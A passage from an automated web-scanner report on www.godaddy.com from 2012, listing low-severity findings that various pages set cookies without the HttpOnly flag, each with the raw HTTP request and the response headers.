Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/shared/video/producttube.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=51; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:42:48 GMT
Connection: close
Content-Length: 17

{"Error":"Error"}

4.91. http://www.godaddy.com/shared/video/videos.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /shared/video/videos.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/video/videos.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=2s25pb4dnqnoa5o4kn2kd4v5; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=2s25pb4dnqnoa5o4kn2kd4v5; path=/; HttpOnly
Set-Cookie: SplitValue1=16; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:47 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=16; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:47 GMT
Connection: close
Content-Length: 2515

{"Html":"\r\n\r\n\u003cscript src=\"http://img3.wsimg.com/fos/script/sales_tabs13.min.js\" type=\"text/javascript\"\u003e\u003c/script\u003e\r\n \r\n\r\n\u003cscript src=\"http://img3.wsimg.com/fos/sc
...[SNIP]...

4.92. http://www.godaddy.com/site-map.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /site-map.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site-map.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=2zsci50gmrxv4jrhbfjm2b0r; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=2zsci50gmrxv4jrhbfjm2b0r; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:10 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:10 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:10 GMT; path=/
Set-Cookie: SplitValue1=41; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:42:10 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/site-map.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=41; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:42:09 GMT
Connection: close
Content-Length: 107890


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.93. http://www.godaddy.com/ssl/JsonContent/GetMultiDomainsPlanList.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /ssl/JsonContent/GetMultiDomainsPlanList.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /ssl/JsonContent/GetMultiDomainsPlanList.aspx HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Content-Length: 82
Origin: http://www.godaddy.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; HPBackground=Danica2; MemPDC1=ljrecdtffbugaahgraqdyjybtizayfne; MemPDCLoc1=net; PCSplitValue1=1; GoogleADServicesgoogleadwordssearch=hbjjxbcaiaffadneicfbdagjqgiiggnd; BlueLithium_domainsearch=keydqgeemhudugljzexamaxfhjofnevf; BlueLithium=ldubxiuhpfmhtbbiyjmelhwaahghdbma; pagecount=13; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; BlueLithium_ssl=zbaitefefbwexbmflgoethnixhqjvich; GoogleADServicesgooglessl=zbaitefefbwexbmflgoethnixhqjvich; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=http://www.godaddy.com/hosting/website-builder.aspx&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1

planType=standard&domainsIndex=0&targetDivID=smulti_ddl_container&ddlID=smulti_ddl

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:55:31 GMT; path=/
Date: Mon, 05 Mar 2012 01:55:30 GMT
Content-Length: 820

{"Html":"\r\n \u003cselect id=\"smulti_ddl\" class=\"t11 plan_ddl\"\u003e\r\n \u003coption value=\u00275710\u0027 \u003e1 Yr: $89.99/yr \u003c/option\u003e\u003coption value=\u00275718\u0027 \u003
...[SNIP]...

4.94. http://www.godaddy.com/ssl/jsoncontent/SSLComparePlans.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /ssl/jsoncontent/SSLComparePlans.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ssl/jsoncontent/SSLComparePlans.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=01stzxyxgdky5g1fxf5mcpbd; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=01stzxyxgdky5g1fxf5mcpbd; path=/; HttpOnly
Set-Cookie: SplitValue1=51; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:14 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/jsoncontent/SSLComparePlans.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=51; domain=godaddy.com; path=/
Set-Cookie: preferences1=_sid=; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:14 GMT
Connection: close
Content-Length: 15266

{"Html":"\r\n \u003cstyle type=\"text/css\"\u003e\r\n .plan_table {}\r\n .plan_table td {border-bottom: solid 1px #b2b2b2;}\r\n .plan_table td.c1 {border-left: solid 1px #b2b2b2;padding: 8px
...[SNIP]...

4.95. http://www.godaddy.com/ssl/jsoncontent/SSLOursVsTheirs.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /ssl/jsoncontent/SSLOursVsTheirs.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ssl/jsoncontent/SSLOursVsTheirs.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=f0zmcxeaa3oj4wpxhunbjepb; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=f0zmcxeaa3oj4wpxhunbjepb; path=/; HttpOnly
Set-Cookie: SplitValue1=9; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:16 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/jsoncontent/SSLOursVsTheirs.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=9; domain=godaddy.com; path=/
Set-Cookie: preferences1=_sid=; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:16 GMT
Connection: close
Content-Length: 23457

{"Html":"\r\n \u003cdiv class=\"pad20lr\" style=\"border-left:solid 1px #dadada;border-right:solid 1px #dadada;width:918px;text-align:left\"\u003e\r\n \u003cstyle type=\"text/css\"\u003e\r\n
...[SNIP]...

4.96. http://www.godaddy.com/ssl/popups/ssl-quicktour-widget.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /ssl/popups/ssl-quicktour-widget.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ssl/popups/ssl-quicktour-widget.aspx?ci=42475&callback=loadQuickTour&targetDivId=quickTourDiv&loadQuickTour=jsonp1330911995435&_=1330912000828 HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: text/javascript, application/javascript, */*
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; HPBackground=Danica2; MemPDC1=ljrecdtffbugaahgraqdyjybtizayfne; MemPDCLoc1=net; PCSplitValue1=1; GoogleADServicesgoogleadwordssearch=hbjjxbcaiaffadneicfbdagjqgiiggnd; BlueLithium_domainsearch=keydqgeemhudugljzexamaxfhjofnevf; BlueLithium=ldubxiuhpfmhtbbiyjmelhwaahghdbma; GoogleADServicesgooglessl=zbaitefefbwexbmflgoethnixhqjvich; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=14; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=http://www.godaddy.com/ssl/ssl-certificates.aspx&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; BlueLithium_ssl=chsduddeifteyewceiebbfsifczdjdig

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:55:37 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/ssl/ssl-certificates.aspx&sitename=www.godaddy.com&page=/ssl/popups/ssl-quicktour-widget.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=ci=42475&callback=loadQuickTour&targetDivId=quickTourDiv&loadQuickTour=jsonp1330911995435&_=1330912000828%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:55:37 GMT
Content-Length: 13314

loadQuickTour({"Html":"\r\n \u003ccenter\u003e\r\n \u003cdiv id=\"cds-slides-tour\"\u003e\r\n \u003ctable cellspacing=\"0\" cellpadding=\"0\" border=\"0\"\u003e\r\n \u003ctr\u0
...[SNIP]...

4.97. http://www.godaddy.com/ssl/popups/ssl-quicktour-widget.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /ssl/popups/ssl-quicktour-widget.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ssl/popups/ssl-quicktour-widget.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=krqcueficrhcgn0xlm3mdfxp; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=krqcueficrhcgn0xlm3mdfxp; path=/; HttpOnly
Set-Cookie: preferences1=_sid=; domain=godaddy.com; path=/
Set-Cookie: SplitValue1=44; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:18 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/popups/ssl-quicktour-widget.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=44; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:17 GMT
Connection: close
Content-Length: 13382

{"Html":"\r\n \u003ccenter\u003e\r\n \u003cdiv id=\"cds-slides-tour\"\u003e\r\n \u003ctable cellspacing=\"0\" cellpadding=\"0\" border=\"0\"\u003e\r\n \u003ctr\u003e\r\n
...[SNIP]...

4.98. http://www.godaddy.com/ssl/ssl-certificates.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /ssl/ssl-certificates.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ssl/ssl-certificates.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=23o1kmxc1brb0crv1kc2uyhz; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=23o1kmxc1brb0crv1kc2uyhz; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:12 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:12 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:12 GMT; path=/
Set-Cookie: SplitValue1=76; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:12 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=76; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_ssl=wfqebbacxfrfmcxgmaejybidyheaagtc; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgooglessl=wfqebbacxfrfmcxgmaejybidyheaagtc; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:41:12 GMT; path=/
Date: Mon, 05 Mar 2012 01:41:11 GMT
Connection: close
Content-Length: 143769


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.99. http://www.godaddy.com/ssl/ssl-certificates.aspx/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /ssl/ssl-certificates.aspx/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ssl/ssl-certificates.aspx/ HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=mzjpoxejfdig4i5qjqwccpgl; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=mzjpoxejfdig4i5qjqwccpgl; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:19 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:19 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:19 GMT; path=/
Set-Cookie: SplitValue1=45; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:19 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx/&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=45; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_ssl=tinanbvdqbpicblaqcacodndrhrhndxh; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgooglessl=tinanbvdqbpicblaqcacodndrhrhndxh; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:59:19 GMT; path=/
Date: Mon, 05 Mar 2012 01:59:18 GMT
Connection: close
Content-Length: 143772


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.100. http://www.godaddy.com/ssl/ssl-open-source.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /ssl/ssl-open-source.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ssl/ssl-open-source.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=ko30ih42onxw50a1pisnuw4w; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=ko30ih42onxw50a1pisnuw4w; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:13 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:13 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:13 GMT; path=/
Set-Cookie: SplitValue1=30; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:13 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-open-source.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=30; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:13 GMT
Connection: close
Content-Length: 95130


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.101. http://www.godaddy.com/tlds/asia.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/asia.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tlds/asia.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=dzsmpqdvoocpu0r1fcr54x0k; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=dzsmpqdvoocpu0r1fcr54x0k; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:32 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:32 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:32 GMT; path=/
Set-Cookie: SplitValue1=1; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:32 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/asia.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=1; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:32 GMT
Connection: close
Content-Length: 130284


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.102. http://www.godaddy.com/tlds/biz.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/biz.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tlds/biz.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=q4s5j00wyex1o0shneeftrrk; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=q4s5j00wyex1o0shneeftrrk; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:26 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:26 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:26 GMT; path=/
Set-Cookie: SplitValue1=11; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:26 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/biz.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=11; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:25 GMT
Connection: close
Content-Length: 129708


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.103. http://www.godaddy.com/tlds/ca.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/ca.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tlds/ca.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=ta2n0nt3ftfzkrbohq0x1jrq; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=ta2n0nt3ftfzkrbohq0x1jrq; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
